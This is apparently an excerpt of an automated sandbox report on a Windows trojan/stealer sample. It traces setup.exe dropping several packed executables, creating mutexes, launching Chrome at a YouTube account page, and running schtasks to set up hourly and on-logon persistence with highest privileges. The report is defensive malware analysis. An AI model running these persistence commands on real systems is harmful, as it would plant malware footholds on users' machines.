Source: C:\Users\user\1000015002\b6042db502.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_00427A4A 9_2_00427A4A
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0043E4FF 9_2_0043E4FF
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0042CAA0 9_2_0042CAA0
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_00427CA7 9_2_00427CA7
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0043676B 9_2_0043676B
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E1F0D0 27_2_00E1F0D0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E5F030 27_2_00E5F030
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DC002D 27_2_00DC002D
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E2A200 27_2_00E2A200
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E1D3A0 27_2_00E1D3A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E163B0 27_2_00E163B0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E10440 27_2_00E10440
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E5E430 27_2_00E5E430
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00EBF550 27_2_00EBF550
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E186B0 27_2_00E186B0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E57600 27_2_00E57600
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E677E0 27_2_00E677E0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00D8B8E0 27_2_00D8B8E0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E01C10 27_2_00E01C10
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00EC5DE0 27_2_00EC5DE0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E7AD00 27_2_00E7AD00
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E1AF60 27_2_00E1AF60
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E13F40 27_2_00E13F40
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E5FF00 27_2_00E5FF00
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E13080 27_2_00E13080
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DB71A0 27_2_00DB71A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DC036F 27_2_00DC036F
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E24320 27_2_00E24320
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E045E0 27_2_00E045E0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DAF580 27_2_00DAF580
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E23610 27_2_00E23610
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DD47BF 27_2_00DD47BF
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00EC7760 27_2_00EC7760
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DBC960 27_2_00DBC960
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DBA928 27_2_00DBA928
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DCDA86 27_2_00DCDA86
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DD8BB0 27_2_00DD8BB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E6FC40 27_2_00E6FC40
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E6EC40 27_2_00E6EC40
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00EB4D40 27_2_00EB4D40
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00EC6D20 27_2_00EC6D20
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DD8E30 27_2_00DD8E30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E72FD0 27_2_00E72FD0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: String function: 00D9ACE0 appears 86 times
Uses 32bit PE files
Source: setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: setup.exe Static PE information: Section: ZLIB complexity 0.9979824862637363
Source: setup.exe Static PE information: Section: rcpodcma ZLIB complexity 0.9948193033656761
Source: explortu.exe.0.dr Static PE information: Section: ZLIB complexity 0.9979824862637363
Source: explortu.exe.0.dr Static PE information: Section: rcpodcma ZLIB complexity 0.9948193033656761
Source: random[1].exe.2.dr Static PE information: Section: ZLIB complexity 0.999087233040201
Source: random[1].exe.2.dr Static PE information: Section: .rsrc ZLIB complexity 0.9955845424107143
Source: 8bcaec3fef.exe.2.dr Static PE information: Section: ZLIB complexity 0.999087233040201
Source: 8bcaec3fef.exe.2.dr Static PE information: Section: .rsrc ZLIB complexity 0.9955845424107143
Source: sarra[1].exe.2.dr Static PE information: Section: ZLIB complexity 0.9987710994525547
Source: sarra[1].exe.2.dr Static PE information: Section: rixklhlm ZLIB complexity 0.9944974229268666
Source: random[1].exe0.2.dr Static PE information: Section: ZLIB complexity 0.9982443220628415
Source: random[1].exe0.2.dr Static PE information: Section: fxenntlj ZLIB complexity 0.9946734033262454
Source: b6042db502.exe.2.dr Static PE information: Section: ZLIB complexity 0.9982443220628415
Source: b6042db502.exe.2.dr Static PE information: Section: fxenntlj ZLIB complexity 0.9946734033262454
Source: random[1].exe1.2.dr Static PE information: Section: ZLIB complexity 0.998578638229927
Source: random[1].exe1.2.dr Static PE information: Section: lprblcfc ZLIB complexity 0.9947089523565574
Source: eaa97795e9.exe.2.dr Static PE information: Section: ZLIB complexity 0.998578638229927
Source: eaa97795e9.exe.2.dr Static PE information: Section: lprblcfc ZLIB complexity 0.9947089523565574
Source: axplong.exe.5.dr Static PE information: Section: ZLIB complexity 0.9982443220628415
Source: axplong.exe.5.dr Static PE information: Section: fxenntlj ZLIB complexity 0.9946734033262454
Source: RageMP131.exe.8.dr Static PE information: Section: ZLIB complexity 0.998578638229927
Source: RageMP131.exe.8.dr Static PE information: Section: lprblcfc ZLIB complexity 0.9947089523565574
Source: MPGPH131.exe.8.dr Static PE information: Section: ZLIB complexity 0.998578638229927
Source: MPGPH131.exe.8.dr Static PE information: Section: lprblcfc ZLIB complexity 0.9947089523565574
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@59/21@14/14
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E677E0 CreateToolhelp32Snapshot, 27_2_00E677E0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\sarra[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\9217037dc9 Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: eaa97795e9.exe, 00000008.00000003.2223816206.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000003.2313995874.0000000005110000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.2314685161.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.2330868888.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2410780137.0000000005470000.00000004.00001000.00020000.00000000.sdmp, eaa97795e9.exe, 00000018.00000003.2497539627.0000000005540000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6958028505.0000000000D81000.00000040.00000001.01000000.00000011.sdmp, RageMP131.exe, 0000001B.00000003.2575871276.0000000005110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: eaa97795e9.exe, 00000008.00000003.2223816206.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000003.2313995874.0000000005110000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.2314685161.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.2330868888.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2410780137.0000000005470000.00000004.00001000.00020000.00000000.sdmp, eaa97795e9.exe, 00000018.00000003.2497539627.0000000005540000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6958028505.0000000000D81000.00000040.00000001.01000000.00000011.sdmp, RageMP131.exe, 0000001B.00000003.2575871276.0000000005110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: setup.exe ReversingLabs: Detection: 50%
Source: setup.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explortu.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: b6042db502.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 8bcaec3fef.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\user\Desktop\setup.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe"
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\1000015002\b6042db502.exe "C:\Users\user\1000015002\b6042db502.exe"
Source: C:\Users\user\1000015002\b6042db502.exe Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe "C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe"
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe "C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2008,i,8769820692203852644,1088490053356293250,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe "C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5500 --field-trial-handle=2008,i,8769820692203852644,1088490053356293250,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3572 --field-trial-handle=2008,i,8769820692203852644,1088490053356293250,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe "C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\1000015002\b6042db502.exe "C:\Users\user\1000015002\b6042db502.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe "C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe "C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe" Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2008,i,8769820692203852644,1088490053356293250,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5500 --field-trial-handle=2008,i,8769820692203852644,1088490053356293250,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3572 --field-trial-handle=2008,i,8769820692203852644,1088490053356293250,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\setup.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Section loaded: mstask.dll Jump to behavior
